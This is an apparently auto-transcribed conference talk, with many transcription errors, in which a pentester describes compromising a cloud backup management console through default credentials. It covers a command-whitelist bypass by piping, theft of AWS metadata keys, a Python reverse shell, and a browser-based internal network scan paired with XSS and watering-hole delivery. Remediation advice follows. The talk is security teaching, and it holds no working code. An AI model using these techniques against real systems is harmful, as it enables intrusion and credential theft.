Pentest Deep Dive: Anatomy Of A Weaponized Remote Code Execution Flaw

thank you thank you so much so and first of all hello to the amazing Portuguese intersect community it's a pleasure to speak here and the very first thing that I want to say is like thanks a lot to all the organizers you are doing an amazing job thank you so much all right and to kick it off yeah it's about pentas deep dive we are looking at a cloud backup software maybe you read it already on the schedule just to tell you a little bit about me so I'm a technical project manager team lead at Cobalt we are fantastic as a service company so we are doing penthouse using a freelancer network of around about

like 270 pen testers and I'm one of them like in my free time I'm doing pen testing in my day to day I'm leading the operations department and yeah I'm also an information security researcher I'm a pen tester I'm a public speaker I'm usually speaking at emphasized conferences sharing my research yeah and I have around about like nine years experience in information security so and let's see what is on our to-do list so on our to-do list today is since it's like the whole story of a pen test it start with the scope it continues with reconnaissance then it goes to the exploitation part the fun part and looking a little bit into remediation this will be a little

bit more generic and then I'll keep it open for questions and I hope you do have some so let's start with the disclaimer that's the boring part I'm sorry so cobalt doesn't share any vulnerability information or publishes any vulnerability for information the following content that you'll see is all my research and is not associated to COBOL at all the company that I'll talk about like in the next few seconds was contacted and they have access to all vulnerability details unfortunately they didn't really care that much so I didn't get a read received nobody replied so responsible disclosure was attempt unfortunately it didn't work away so let's have a look at the scope and we are talking about a vulnerable limited

so that vulnerable limited is a company they deployed AWS their internal network in AWS like most of my clients nowadays they really like to go into cloud because of cloud a sip close cool everybody loved that and it also easy to manage you can like scale as we grow and stuff like that you don't have to buy servers that's all the stuff that you have to buy stuff and you have put money on it that's really cool on AWS so the client was particularly interested and yeah checking out if or assuming I'm sorry assuming that attackers gain access through a compromised web server like yeah the web application there that can be anything that can be an online shop

that can be no idea in newspaper sites or some content management system maybe like a bird press or something so and imagine that gets now compromised that web server is deployed on your internal network so and externally reachable so with access on that on their web server you can now like spread out through the whole internal network so it's essentially an internal network assessment on the cloud basically so and the goal of the assessment was to get access to sensitive data as always so on how do you do that you start with recon sense and the one thing that is pretty cool when you're dealing with pretty large internal networks you want to get something to look at pretty soon so you

start of course a map I mean everybody starts at the end map and then you start with a curtain to get some screenshots to get like pictures that you can look at where you can easily spot ok that's a tomcat and if we see a tomcat and I think everybody here at rise of foster default credentials and the 99% of the case that it works that's it was not that easy that were at that time and of course we go but Metasploit just to go like with the really really really low hanging fruit like eternal blue usually always works yeah that's how it started here also and that's a cool map that a Croatoan actually then generates when you when

you do that when you do the expert on the scan so it's you see like hot spots and they are like similar so when when you have Hollis your group by and you it's a little bit it's a little bit more bold here then you see they are related so they made my share like the same software components they might be able all it might be all tomcat servers or all the press servers or something so it's a little bit cool grouping and it also it's kind of fancy I mean I like it yeah then it gives also a little bit more into detail about the actual services that are found so you can then

scroll through and look at the services and yeah that's that's the thing that we'll talk about today it's the cementum management console and it's a mana management console when you look at it I think it feels a little bit like like it really early days of the internet it could use the designer I think and so it's built on Apache and it's really really agency so and that's also something that expert one actually really does a good job at so at this place you like the HTTP code this place you this web server that is used and then some components that web server is using you can of course then dive into details like it captures also like the

HTTP request headers and stuff like that so if you want to get a little bit more into that you can do that but it's not really needed at all that picture already caught my attention and now we have it a little bit bigger yeah so that's basically that's basically the Internet and you log in interface you log in under the username and a password and then you have some check boxes that you can check to automate some of the actions when you when you log in and then there are some links to they have forums and stuff and yeah that's basically blog on page so on just to have a little bit over this explanation what that actually does so

the cement management console is actually yeah the management interface of semantical backup and some in the cloud backup is a software solution to backup your internal network to various cloud backup solutions like you can backup to s3 buckets you can backup to Google Cloud you can backup wherever you want basically and Samana is basically automating that so and obviously if you want to upload all of that data to the cloud you have to get that software access to your cloud credentials and that's a juicy part we'll look into that later so but first of all let's just Google so we go get a little bit for it and have a look or any default credentials because that's usually the

first thing that you do when you see like an login login form and you're always wondering did they actually change the default credentials and yeah of course not so the default credentials are admin admin I think that's very creative and yeah so they also documented on their dock on their public documentation so that's pretty cool it's basically the first Google result so and after trying them out you are basically in and it looks like that so then you're basically going through that and have a little look about what's available here and of course you are looking for secret keys you're looking for all sorts of configuration files you're looking for features that are interesting like stuff

like can you maybe execute comments can you maybe load configuration files what about like reporting can you export something or maybe CSV import export features can you generate PDF files stuff like that because you always have to remember that things deploy on Macleod and it has the ability to choir to speak to AWS metadata endpoint and then you can extract even more keys so even more keys then they the keys that you already got - right now so now you already have some cool areas secret keys you import them to the next tool that you that you have to evaluate a little bit what you have access to maybe those keys are now you're all ready to execute code if

you're lucky in that case I was not but you are going of course a little bit further and you want to look a little bit what other features are available so when I was a cool feature that's in the Advanced tab of it and that feature allowed to execute execute comments I think that's some sort of debug feature that they want to have and it's also very dangerous so you see it's like experts only and since I'm an expert I looked at that of course and it's they also like display like behind their only non interactive comments all out they're very boring so you don't only want to get restricted to the comments that you

can execute here and I was thinking okay what happens if a provider for an input yeah first of all a little bit sad because it didn't work that way and I could really only execute the comments that were vital sit there but there's always another way so what happens if you pipe the output of a comment into another comment what gets then executed and you see here the second comment gets executed so that's cool but the second comment is actually not even whitelisted so that's working now but what happens if you do something like that so now we have a cure request that requests secret keys of that that AWS metadata endpoint and that's not even allowed cool you

can't even access people because that not whitelisted so now you have access to even more secret keys that's cool but you want to get code execution like real code execution and how do you do that well yeah you build some sort of crap comment that you put in front of like you echo like an A or something or whatever character you want to have something that you can just ignore and then you pipe private basically and to like something that tree hits your reverse shell and at that case it's like a Python comment I'm sure they're like 200 million other ways to do that that's just the most reliable and it worked perfectly so if you

execute that you get in my shell and now you have basically excess code execution excess on that code management backup server and that's pretty cool now so but the thing is you're a little bit limited I mean there are default credentials what if somebody changes them that's pretty that's pretty sad and and you also can't really automate that attack that's also not cool so but maybe if they don't change the default credentials you can automate it some sort so there are some prerequisites like for example you have to know the IP address of the server that's also something which is not ideal if you want to automate it and recognize it you have to rely on that they changed actually

that it didn't change the default credentials something that usually really works because nobody does that and yeah if you chained it all together you can basically lock somebody in because you can't really rely on that you the user that you social engineers actually authenticated often the cases that you target some sort of network engineer that has no simple clue about that service so you want to make sure that just by clicking on a simple link that network engineer with access to the internal network compromised the stat server so and you have to rely on default credentials now and you have to know the IP address I always then it's working really really really cool so the proof of concept of

write up is available on github like not right now but seconds after their talk but now we are talking a little bit more about automating stuff so knowledge over the IP address now that's a little bit of a tricky one so you want to have like a proof of concept that scans you whole internal network for IP addresses or hosts that are active and then basically checks if those servers that are up are basically some indirect code management software hosting fault management software so how do you do that so there are some cool guys that really do amazing research around that like Skylands of matthew ohm they now if you own developed something called J as reckon that's a pretty cool

tool and that allows using WebSockets to scan the internal network and you can it works with basically with timing timing attacks so you can that you can build up like a WebSocket connection to an arbitrary port and depending on how fast the ready the very state changes you can guess if that's open if that's filter or closed and that all you really need to know because once we know that service is actually online you can start with just picking any file any static file that you can find on that website maybe the logo the logo for cement that works just great or any other picture of file that is pretty unique to that service and then you hard-code that in

and then you set up no idea you can set up like an iframe or an image tag to it just add like an event handler to that and let it call let it do something if it's if it creates an error or not so any of you do that that works pretty a pretty amazing and I have a little demo how that's working for IOT cameras I hope that the video is actually loading and it is loading nice so that's my prior research about IOT devices and that's basically me implementing that whole attack for IOT camera it's an HTTP request baseball mobility it's a common injection and you see now network is scanned in the background

once the device is found the militias request is fired and now you got code execution let's wait a little bit until the tailored service is up and there you go so that's the cool thing now since when you when you keep that in mind you can recognize every single IOT attack that is like HTTP request based so like it's like if it's a get request if it's a post request doesn't really matter you built that using WebSockets you build some sort of fingerprinting in there so you can even have like a whole attack framework here you can build that for IOT devices like in this case it was a CCTV camera we can build in there like

the cement a bear and backup management software and you can like if you build modules for that you can have a pretty nice attack framework where you just have to trick somebody to with it that side so and maybe you notice that in that in that video that's the only little downside of that is that once that scan is running if you have a large network that takes time so and you have to trick the user into actually doing something that doesn't bore them so you have to provide them a video or a song or something that they read imagine you can also combine it with a cross-site scripting vulnerability and combine it with a watering hole attack maybe you

know that your network engineers they read a specific newspaper every single morning or something like that and you find a web application vulnerability there you inject that malicious JavaScript code and it's running in the background usually they probably won't finish the article in like 10 seconds hopefully if it's interesting so and if they stay long enough on that that is totally totally enough to scan your network so then getting to the remediation advice here I mean always change your default credentials I'm sorry that's not rocket science but it's pretty obvious and still people don't do it then the patch management policy would be really really helpful so if you deploy some weird cloud management software onion at work make sure that

you actually that's always a nice recommendation to and them I think the last one is pretty cool that you can actually ask for pen test reports to every single time that your company purchases software or they want to deploy something like push push them and ask them for yeah the last pen test report did they ever do like a security assessment did they ever try to to show yeah if they actually care about security make it part of the whole sales process so if you want to if you want to buy a tool tell your procurement department if there's no painters report I'm sorry won't buy and that would be a cool cool idea already

and then don't only request the panther's report send it to your security guys or to somebody who knows it and let them interpret dependents report if that's looking really really bad maybe consider another vendor there are so many you don't have to go with the first one so yeah and that's basically it if there are any questions I'm more than happy to answer them [Music] [Applause]